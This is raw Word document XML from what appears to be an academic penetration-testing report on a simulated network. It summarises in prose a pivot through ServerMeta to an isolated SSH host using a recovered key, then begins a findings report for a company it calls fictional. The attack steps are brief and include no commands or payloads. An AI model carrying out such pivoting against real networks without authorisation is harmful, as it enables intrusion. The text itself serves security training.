          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource93"</w:instrText>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.74</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidR="003D4AE4"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Using ServerMeta as a pivot, the tester scans Subnet 4 and identifies SecretMachine (10.0.4.141) running SSH, confirming that it cannot be reached directly from Kali</w:t>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="155" w:name="paragraph94"/>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource94"</w:instrText>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.75</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:bookmarkStart w:id="156" w:name="paragraph95"/>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource95"</w:instrText>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.76</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. With the recovered key, the tester authenticates as ubuntu to SecretMachine, successfully pivoting into the isolated subnet and compromising the final host</w:t>
      </w:r>
      <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> which also is shown in </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource93" w:history="1">
        <w:r w:rsidR="00F257D9" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>Figure A.74</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A3235" w14:textId="13B2281B" w:rsidR="003D2DE1" w:rsidRPr="00D77DFE" w:rsidRDefault="003D2DE1" w:rsidP="00FE1C8A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500F8B38" w14:textId="4CB8224A" w:rsidR="00123285" w:rsidRPr="00EA3D53" w:rsidRDefault="003D2DE1" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59DF7D41" wp14:editId="1C7D162C">
            <wp:extent cx="4989195" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="168236683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66832" name="Picture 1" descr="A diagram of a network&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5046800" cy="2283489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0025388A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 5.7: Attack flow for pivoting</w:t>
      </w:r>
      <w:bookmarkStart w:id="157" w:name="_Toc223521136"/>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534337CD" w14:textId="35105EBF" w:rsidR="006F08D7" w:rsidRPr="00451A2C" w:rsidRDefault="00E17F71" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451A2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. PENETRATION TESTING REPORT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="6A0AD671" w14:textId="51F29237" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00390C3C" w:rsidP="00887806">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This chapter presents a professional penetration testing report for a fictional organization, demonstrating how identified vulnerabilities are documented with appropriate severity ratings and remediation recommendations. The primary audience for this report includes developers and security engineers, while a high-level, non-technical overview is provided in the Executive Summary section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18883D8A" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532FA570" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009A2470">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Assessment Findings Report -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C24A54" w14:textId="079D9CE9" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="001675BC" w:rsidP="009A2470">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:spacing w:val="-10"/>
          <w:kern w:val="28"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>AegisCoreTechnologies S.A. (fictional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA69E3" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ACD633" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA226DC" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B9B8EF" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>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8"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="4583"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="6EAEB1A9" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="4DF8A20F" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="741" w:right="728"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-4"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="566DEF64" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="1270" w:right="1254"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4583" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="5285B647" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Contact</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="128EF4ED" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BBD4EC"/>
          </w:tcPr>
          <w:p w14:paraId="3EE28181" w14:textId="4EADEF9C" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00F33AF8" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Simulation</w:t>
            </w:r>
            <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="2652887A" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1156F161" w14:textId="14FF2394" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="001675BC" w:rsidP="009A2470">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Dr. Aleksandra Nowak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F76E271" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009A2470">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Global</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-15"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-15"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Security </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ED9D87A" w14:textId="0F7588DF" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Email:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>aleksandranowak@aegiscore.tech</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="112D3DDF" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BBD4EC"/>
          </w:tcPr>
          <w:p w14:paraId="474A8716" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SudoZain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="535141CC" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="272"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FAB568D" w14:textId="5C3B9D58" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009A2470">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
